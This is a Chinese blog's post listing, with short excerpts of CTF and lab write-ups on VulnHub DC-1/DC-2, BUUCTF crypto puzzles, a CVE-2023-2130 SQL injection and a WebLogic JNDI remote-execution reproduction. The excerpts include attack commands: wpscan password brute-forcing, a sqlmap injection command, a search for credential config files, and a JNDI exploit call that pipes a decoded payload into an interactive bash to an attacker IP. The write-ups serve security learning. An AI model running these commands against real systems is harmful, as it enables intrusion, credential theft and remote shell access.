自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(8)
  • 收藏
  • 关注

原创 DC-2

1.探测目标DC-1的ip因为已经设置为了NAT模式所以可以通过arp-scan网段进行发现目标IP我这边用的是arp-scan。利用代码:wpscan --url http://dc-2/ -U user.dic -P pwd.dic。2.使用nmap -sV -p- 192.168.106.130进行扫描查看端口。我们需要去etc/hosts之中添加一句话:IP dc-2。10.rbash绕过。3.使用whatweb进行扫描框架。使用代码:su 用户名进行转换。6.使用wpscan进行利用。

2024-05-30 17:33:02 334

原创 DC-1

查找这个文件cat `find / -name settings.php` 查看到了这个文件。我们在ls中发现一个flag1.txt我们尝试查看这个文件。看到其中存在一个users的表我们对这个表进行查看。从配置中找到了flag2其中有数据库的密码和账户。找到对应的物理地址对应ip就是我们的DC-1。有过一个命令执行我们对这个网站进行尝试。我们进行数据库等进行查看在查看对应的表。也可以进行对密码的修改这里不提及了。我们在账户中找到了新的提示。爆破出ssh的密码进行连接。发现确实存在攻击成功。

2024-05-07 11:49:03 363

原创 BUUCTF-密码学4

在搜索的时候发现playfair同时也是一个加密方式那么我们就可以直接进行解密了。由解码出来的结果可以知道并非是最终结果但是由组成可以看出是一个rot47的加密。下载文件发现是一个mp3听文件很明显是摩斯密码我们将密码听下来。从题目中奇怪点的是"公平的玩吧"这个词那么我们从发这个词出发。我们猜测他为8进制码我们需要将其进行每三个为一组的拆分为。拿到题目发现他给了一个字典那么我们肯定需要利用这个字典。由题意我们可以知道他是一个base64的解码。由曲谱我们可以知道几个重要信息。flag为KEYUIS后面的。

2024-05-07 10:22:55 276

原创 春秋云镜-CVE-2023-2130

查看fllllaaaag表代码: python sqlmap.py -u "http://eci-2zeiing4hax0whiyrcmk.cloudeci1.ichunqiu.com/admin/suppliers/view_details.php?使用代码:python sqlmap.py -u "http://eci-2zeiing4hax0whiyrcmk.cloudeci1.ichunqiu.com/admin/suppliers/view_details.php?测试是否存在sql问题我们在?

2024-04-28 19:26:53 170 2

原创 BUUCTF-密码学3

通过词频分析的网站分析我们得到了答案及是第一个箭头所指的题目说是答案为小写所以要全部转换成小写。flag为:flag{640e11012805f211b0ab24ff02a1ed09}但是因为题目说是小写所以我们需要把分析出来的答案进行大写字母小写后提交的答案才是正确的。通过题目我们发现这是一个杂乱无序的一段话我们可以猜测这个又是词频分析的问题。通过题目我们可以看出这个是一个次品分析的题目(链接上面第一题是有给的)flag为:flag{dsdasdsa99877LLLKK}

2024-03-06 10:17:04 1024

原创 BUUCTF-密码学2

为了解决这个问题,我们需要将字符串编码为字节串而我们的Unicode为utf-8的展示形式所以我们给报错的位置加上这个。我们可以看到他有一行时ctf我们继续观察这一行他每一段都是32位我们猜测这是一个md5加密所以我们放到md5解密的地方发现后一个刚好可以解出来答案。我们将题目中的拿出来进行凯撒在移动量来到13时就是一个有意义的单词那么我们可以确定这个加密的移动量为13。我们通过上面的代码可以得到d值而题目中告诉我们只需要求d那么flag就是求出来的d。由此可以得到flag:flag{那你也很棒哦}

2024-03-05 09:58:26 882

原创 BUUCTF-密码学1

可以从中看出其是base64解码我们放入软件进行解码得到flag:flag{THE_FLAG_OF_THIS_STRING}

2024-03-04 19:59:21 235

原创 Weblogic Server JNDI命令执行漏洞复现

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,此处填写加密的东西} | {base64,-d} | {bash, -i }" -A "攻击机ip"注:在同一个机子上面运行攻击机需要的软件。第三个填写JNDI的恶意构造的内容。第六步:将恶意的服务地址填入工具中。需要填入恶意地址为箭头所指的地方。第三步:利用工具进行exp利用。第一步:安装存在漏洞的镜像。②处填入你需要监听的端口号。①处填入攻击机的ip。

2024-03-04 18:55:26 317

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除